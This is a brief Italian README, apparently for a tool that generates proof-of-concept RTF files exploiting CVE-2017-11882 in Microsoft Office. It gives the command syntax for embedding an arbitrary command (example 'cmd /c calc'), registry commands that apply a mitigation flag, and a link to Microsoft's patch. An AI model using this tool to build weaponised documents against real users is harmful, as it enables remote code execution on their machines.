
CVE-2017-11882 Generatore di file PoC
Esiste una vulnerabilità di esecuzione di codice in modalità remota nel software Microsoft Office quando il software non gestisce correttamente gli oggetti in memoria. Un utente malintenzionato che sfrutta con successo la vulnerabilità potrebbe eseguire codice arbitrario nel contesto dell'utente corrente.
Questo è un PoC rielaborato, da quello originale realizzato da Embedi, per generare un singolo file .rtf con un comando remoto incorporato.
python 2017-11882_Generator.py -x command_to_execute -o output_file_name
Example: python 2017-11882_Generator.py -x "cmd /c calc" -o test.rtf
For 32-bit Microsoft Office package in x86 OS: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
For 32-bit Microsoft Office package in x64 OS: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Microsoft ha rilasciato una patch https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882